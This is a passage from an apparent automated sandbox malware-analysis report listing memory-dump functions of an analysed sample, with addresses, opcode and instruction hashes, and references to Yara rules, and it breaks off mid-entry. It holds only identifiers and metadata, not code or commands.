                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d589c541da6f8203164ed4af5dc85db1baa9a89f0b588028c8b5c4a3c21e0079
                                        • Instruction ID: 9dcf4579c9b5220c8ba6c3d680d602e4fe73b841ca4f45bec920350aa741b069
                                        • Opcode Fuzzy Hash: d589c541da6f8203164ed4af5dc85db1baa9a89f0b588028c8b5c4a3c21e0079
                                        • Instruction Fuzzy Hash: FA018F30A0C68C8FCB85EF64C869AE97FB0FF25300F0500EAD448C71A2CB349A94CB41
                                        Function 00007FFD9BB04CC9 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1fd90be7bb1fa352e7daa08754edeff15e3cde6d27b3d634d1877aa99e89edd7
                                        • Instruction ID: 03847d8d8272d9ce118bec67c5e82dbc0b440b504dc2505ecc0ca97a57f05512
                                        • Opcode Fuzzy Hash: 1fd90be7bb1fa352e7daa08754edeff15e3cde6d27b3d634d1877aa99e89edd7
                                        • Instruction Fuzzy Hash: 4C018B3090968D8FDB95EF68C8586E97BB0FF15304F0506EED458C72A2DB349A44CB40
                                        Function 00007FFD9BC71B39 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e79d233a75ced01e911407337d93057c398ff0e615cbaf96d928a7181a3942a4
                                        • Instruction ID: 9729419744e2aea9586c90dbd95a42746f0735f454b2e6ed5036030793381e81
                                        • Opcode Fuzzy Hash: e79d233a75ced01e911407337d93057c398ff0e615cbaf96d928a7181a3942a4
                                        • Instruction Fuzzy Hash: CF018F3090868C8FCB85EF68C8A8AA97FB0FF29301F0540DBD448C71A2D7349994CB80
                                        Function 00007FFD9BB02419 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41290ca5748e3ab31d5a46a20c2c2b3bd6275c99f5226820877b0d44051d269c
                                        • Instruction ID: 16882f4b99bdb04a1650ac0767c00d2c462c83dd2a2fde04a79aa60b72c92fbb
                                        • Opcode Fuzzy Hash: 41290ca5748e3ab31d5a46a20c2c2b3bd6275c99f5226820877b0d44051d269c
                                        • Instruction Fuzzy Hash: AD01D13091868D9FCF44EF68C494AEA7BB0FF19304F1040AAE45DD32A5CB31A590CB80
                                        Function 00007FFD9BAFBA98 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92ed323ca19008da5d58666093f2f1aae3a1ebd7ec90a00cf7f4302910eee047
                                        • Instruction ID: c6200f79e5d85c28c36e7d1e5584b2c2d14dd1962c08165cb09190c15c14db4d
                                        • Opcode Fuzzy Hash: 92ed323ca19008da5d58666093f2f1aae3a1ebd7ec90a00cf7f4302910eee047
                                        • Instruction Fuzzy Hash: 96011930914A4D9FCF84EF58C859AEABBE0FF68305F01016AA40DD3260DB35A694CB80
                                        Function 00007FFD9BAFE590 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aec28568db429c41c5d38fae9f5a16e0a43371069f31fd53dfc9330ebe4ad042
                                        • Instruction ID: fedfc5d22e8b0bc9f7eadf679c367e892b38563c73bedb2518eec7c3045d9fa8
                                        • Opcode Fuzzy Hash: aec28568db429c41c5d38fae9f5a16e0a43371069f31fd53dfc9330ebe4ad042
                                        • Instruction Fuzzy Hash: 3101C97091490D8FDF84EF58C848AEEBBF0FB68305F00456AA41DD32A4DB709690CB80
                                        Function 00007FFD9BB0C1F0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daae0e97362b4375e750f7d750957227ad8f799668d22b8b445150b90f4cdfba
                                        • Instruction ID: c809213e21ebea127b3168d0d5ad7d23da309dc117122d62d3135fd9ed579cab
                                        • Opcode Fuzzy Hash: daae0e97362b4375e750f7d750957227ad8f799668d22b8b445150b90f4cdfba
                                        • Instruction Fuzzy Hash: E2F0EC30914A4D9FCF84EF58C859AEA7BF0FB68305F0041AAA80DD3264DB31E694CB81
                                        Function 00007FFD9BAFDBC0 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e89fa3bb48050f034eb38f0cd23184f0cd292ba0a3d5ea6e16950a0918e6f2b9
                                        • Instruction ID: 0c89cb92a839ef9b9cc9de00b061e02d6ba44ab022fd40723a6a5707fc5f39e4
                                        • Opcode Fuzzy Hash: e89fa3bb48050f034eb38f0cd23184f0cd292ba0a3d5ea6e16950a0918e6f2b9
                                        • Instruction Fuzzy Hash: EDF0EC30914A4D9FCF44EF58C859AE97BF0FF68305F00456AA80DD3260DB30E594CB81
                                        Function 00007FFD9BB03620 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9160bf9ee52eb021502e8ac87ecd486edf687e31969619b36cbb8c56aa36a4ad
                                        • Instruction ID: e50c58ed5e71d20d50d3a86533e1bbbeb0a10a950505701e1ad50ecd43ed0285
                                        • Opcode Fuzzy Hash: 9160bf9ee52eb021502e8ac87ecd486edf687e31969619b36cbb8c56aa36a4ad
                                        • Instruction Fuzzy Hash: D1F0C93091890D8FCF84EF58C848AAA77F0FB68304F00056AA419D3294DB309654CB80
                                        Function 00007FFD9BAFB610 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8bd71dff4d6c89aa2297c0c1f1522df1f89efa5b118dad4f5e68b577860a19f
                                        • Instruction ID: 34537b2ca90799bdb1f3ff4f939e087a341d32ee5117d50136b4a567673a784c
                                        • Opcode Fuzzy Hash: b8bd71dff4d6c89aa2297c0c1f1522df1f89efa5b118dad4f5e68b577860a19f
                                        • Instruction Fuzzy Hash: F0F0BD3091494D9FDF84EF58C459AEA7BF1FB68305F5041AAE41DD32A0DB719694CB80
                                        Function 00007FFD9BAD0C81 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7f9629f34f541cb11783ba7e2c67d073ee8dedf2486fc0330abba188aceb704
                                        • Instruction ID: 29ddda56207e0594c9acad9278a758baa0d44d59e1179d07cb12b961171c2606
                                        • Opcode Fuzzy Hash: c7f9629f34f541cb11783ba7e2c67d073ee8dedf2486fc0330abba188aceb704
                                        • Instruction Fuzzy Hash: 7C016D71E0450E8BEB28DF80C8645BE7BB1EF94314F40063AD416D72A5DFB46A81CB84
                                        Function 00007FFD9BB02428 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d749cd8349cc04765cd0d37e676e2dc6377353ee0270f0cf2653271901582839
                                        • Instruction ID: d4f9239f3b64b8a4f0943c6bfc0e883a39bbb84ef7df32abec67c4b57cd60886
                                        • Opcode Fuzzy Hash: d749cd8349cc04765cd0d37e676e2dc6377353ee0270f0cf2653271901582839
                                        • Instruction Fuzzy Hash: 4EF0BD3091494D9FDF94EF58C458AAA7BB0FF58305F1041AAE51DD32A4DB31A694CB80
                                        Function 00007FFD9BAC838D Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42a9cbae5b864705017c7bd37cb8c91f339d81812496af99c2c5d3503ef170d8
                                        • Instruction ID: 4cf1408d7dab8ec514f5814fea1596e2dd16c6c3804258e10c4214260b8f1bb4
                                        • Opcode Fuzzy Hash: 42a9cbae5b864705017c7bd37cb8c91f339d81812496af99c2c5d3503ef170d8
                                        • Instruction Fuzzy Hash: 91F0B430509A8DCFCB90EF58C855AEA3BE0FF69310F0501A6E41CC7261D774E964CB81
                                        Function 00007FFD9BAC8BAD Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3f2d2c1499cc4d25db7e9ebf313e8eb8f762afea3aa0134302f35407febfa4d
                                        • Instruction ID: 8695cd099b5f1cb50f256b364caec7c20b00e782428fe8d7b8082869f80c2d2d
                                        • Opcode Fuzzy Hash: c3f2d2c1499cc4d25db7e9ebf313e8eb8f762afea3aa0134302f35407febfa4d
                                        • Instruction Fuzzy Hash: 6AF0903090968DCFCB94EF18C865AA93BE0FF69310F0501A6E418C7161D774D960CB81
                                        Function 00007FFD9BB0CA10 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33cb2adf4dbcd35528a2f67fbe92fbed39c68f1e489659150bc3d59b15aed7d4
                                        • Instruction ID: 84b6ddc58bd88952223b54ef007867743ec004307d8309b154fd43da83a63e3e
                                        • Opcode Fuzzy Hash: 33cb2adf4dbcd35528a2f67fbe92fbed39c68f1e489659150bc3d59b15aed7d4
                                        • Instruction Fuzzy Hash: 6EE06871A09B4C4FDF50EB599820AE87BA0FBC9308F04106AF00CC62C0C6225940C341
                                        Function 00007FFD9BAB0CCF Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d704cb908bc9ef7b74fa3baf8c9239023d8cfe495441689c0e3b464015827a0
                                        • Instruction ID: 3f71d913f33ca2ff8338b4de38f73f6f451b0f853909c6ad32b40b020b3c94e2
                                        • Opcode Fuzzy Hash: 7d704cb908bc9ef7b74fa3baf8c9239023d8cfe495441689c0e3b464015827a0
                                        • Instruction Fuzzy Hash: CFF0C830A0911A8BE724CB94C8542FD73B0BF45700F04067AD029922D2CBB46640CF44
                                        Function 00007FFD9BAD4053 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8786a42990bbe4a48e24292b29af5f92defa55f5e0bbc4a13197cb3c4e02cbcf
                                        • Instruction ID: 8ed502daa1096d9ba1a2cd50b7611cc888fa675e447863a2f18e20cca8d0fe24
                                        • Opcode Fuzzy Hash: 8786a42990bbe4a48e24292b29af5f92defa55f5e0bbc4a13197cb3c4e02cbcf
                                        • Instruction Fuzzy Hash: 9DE03030A0A51E4FE7A4AB4888712FD7262EF98340F8142B5E41E972E2CD762A414B00
                                        Function 00007FFD9BAC81ED Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bff33c447f9a0cb5cf60fa24ee5b08f680cb63a9ebc0bb5e895d1b1985f1da75
                                        • Instruction ID: d0534c67ca1db9bd27efa68d80662515bdf8b0a1d76efbcf5ccdf35f630fa981
                                        • Opcode Fuzzy Hash: bff33c447f9a0cb5cf60fa24ee5b08f680cb63a9ebc0bb5e895d1b1985f1da75
                                        • Instruction Fuzzy Hash: 56F08C3194D68C9FDB51AF64885D6A87FF0FF19310F1604EBD418C60A1DA349654CB01
                                        Function 00007FFD9BAD19ED Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction ID: 021843fdc6251fc87d07bbc71217f91f9d6aabf7a9ef5864890bc31cfd7bd590
                                        • Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction Fuzzy Hash: 3DF07A70E5E20DCAEBB49BF584557BCB6B0AF65301F31117AD00D931A2DEB82A809E00
                                        Function 00007FFD9BAB6B59 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction ID: 025495de2ef62c2b6b52e765d8e55e13895c0dafb233555c0797803ba5fefd68
                                        • Opcode Fuzzy Hash: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction Fuzzy Hash: 44E08C31E2866C89EBA8DB20C854AECB3B1EF54300F4045FB800EB2094CEB41A818F00
                                        Function 00007FFD9BAB70E6 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
                                        • Instruction ID: 90a62458c57da404cc8f11fc26c05cf80ae387fdd7664762758cfe5f10e67e7b
                                        • Opcode Fuzzy Hash: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
                                        • Instruction Fuzzy Hash: 00E01270A0A52A8AF7349B54C8583BCB3B0EF85300F1040B8C11E633D1CE781A80CF45
                                        Function 00007FFD9BAFAD25 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3c5ed1a37d09cb437f92ef7fd4944ac7ba7c31a1008bbc85900832e193856f6
                                        • Instruction ID: 075029667e04d6ba30312ab8628189e333709e15735d25311403eeeb643df6b3
                                        • Opcode Fuzzy Hash: a3c5ed1a37d09cb437f92ef7fd4944ac7ba7c31a1008bbc85900832e193856f6
                                        • Instruction Fuzzy Hash: 72D01730A1960E8EDB60EB10C414BEEB271FF14304F4042A5900D97196CA386A818F81

                                        Non-executed Functions

                                        Function 00007FFD9BB1A49D Relevance: .1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0482545f1947aaa1f6d17659b5320f026592e8dc57bea2df2c53f20b0f22acf
                                        • Instruction ID: 85b6bfdd76b04aef49f21ac811c2d928213e3a7feda7e1428e37f4b6bbd65899
                                        • Opcode Fuzzy Hash: f0482545f1947aaa1f6d17659b5320f026592e8dc57bea2df2c53f20b0f22acf
                                        • Instruction Fuzzy Hash: 2F41DF7194E7CA4FDB539BB488756A47FB0EF17204F0A01EBD489CB0E3D6286955CB22
                                        Function 00007FFD9BAF2731 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4$R$T$a
                                        • API String ID: 0-2417396697
                                        • Opcode ID: 7db893b8f6c4e34f8ef0762fde0285b75399edce57ac433488059026fdc6616d
                                        • Instruction ID: abc65826223c9f10ddfad24c48e31fc87026b76ccf8a92ab80e470453ddb7933
                                        • Opcode Fuzzy Hash: 7db893b8f6c4e34f8ef0762fde0285b75399edce57ac433488059026fdc6616d
                                        • Instruction Fuzzy Hash: 58216BB0E0965D8BEB64DF80C4943FDBBF1EF64305F1442B9C009A62A1DEB86A84CB10
                                        Function 00007FFD9BB00DF9 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '$.$2$?
                                        • API String ID: 0-982240037
                                        • Opcode ID: 38f2633e5e0845ad0ab92e4fe7a34e8da46f289df097936d4fc6b6c9114e9d49
                                        • Instruction ID: 09b60330e7301bbf6d3be41f1b3b54b1730e3c28069988ada6a9398d388aa988
                                        • Opcode Fuzzy Hash: 38f2633e5e0845ad0ab92e4fe7a34e8da46f289df097936d4fc6b6c9114e9d49
                                        • Instruction Fuzzy Hash: 3B110A30A0921ACBE7A5DF14C8987A87BF5EB14706F1181FAC40D962A1DFB85AC8CF01

                                        Executed Functions

                                        Function 00007FFD9BAA0D70 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b48ae521919a2ad9b875e6a8154e27808a89f644dfacf5e5fba580aa7d6842d
                                        • Instruction ID: 0b09788d17bd05f5fdf4f46f14ab673d568728895e811f2c6ce0c7186765a05c
                                        • Opcode Fuzzy Hash: 5b48ae521919a2ad9b875e6a8154e27808a89f644dfacf5e5fba580aa7d6842d
                                        • Instruction Fuzzy Hash: 8591AEB2A08A8D8FE7A8DB68C8657A97BF1EF99314F0101BAD04DD73D6CB781815C750
                                        Function 00007FFD9BABBD2D Relevance: 1.5, Instructions: 1452COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8aefe84e21d6a905701af8bcb450b7159c794bb1b3bbe40fd273e2c1470ebff
                                        • Instruction ID: 078c47ed15f8b3c27f9564fa2d94f6038ecf4eb3b177f1302afc600343453db3
                                        • Opcode Fuzzy Hash: a8aefe84e21d6a905701af8bcb450b7159c794bb1b3bbe40fd273e2c1470ebff
                                        • Instruction Fuzzy Hash: 7CC22F71E0996D8FEBA8DB58C8A5BA8B7B1FF58310F0401F9D05DD7292DA746A81CF40
                                        Function 00007FFD9BAA4DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        • Opcode ID: b09a16faab780d627c0ab37adf30946addde3df1d28fabfc3e47e2115c7353da
                                        • Instruction ID: abc40cf22caa29f477cbdfd947d6c183ec28103719edcb33bf5225e349571cbb
                                        • Opcode Fuzzy Hash: b09a16faab780d627c0ab37adf30946addde3df1d28fabfc3e47e2115c7353da
                                        • Instruction Fuzzy Hash: 87112870E059698FEB74DB18CC547E9B7B2EF94316F1082E6D40DE22A5DE782A818F40
                                        Function 00007FFD9BAB9079 Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
                                        • Instruction ID: 031e4c92cdecdc4e0951c729cb268430161a9ff9933eff04a1a6a518209addb1
                                        • Opcode Fuzzy Hash: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
                                        • Instruction Fuzzy Hash: 6751A030A09A4D9FCF84EF98D898AED7BF1FF58310F0501A6E419E7261D674E990CB90
                                        Function 00007FFD9BAA0998 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9df0417d4e4ebb246ad32a299baad8fbc8f6c14e0d4cbca6c2d1decc27e194cd
                                        • Instruction ID: 3836e5cfa354f80b278a594b25b108832967fa9d48b90e9c6a6e5f4d11e8bf6f
                                        • Opcode Fuzzy Hash: 9df0417d4e4ebb246ad32a299baad8fbc8f6c14e0d4cbca6c2d1decc27e194cd
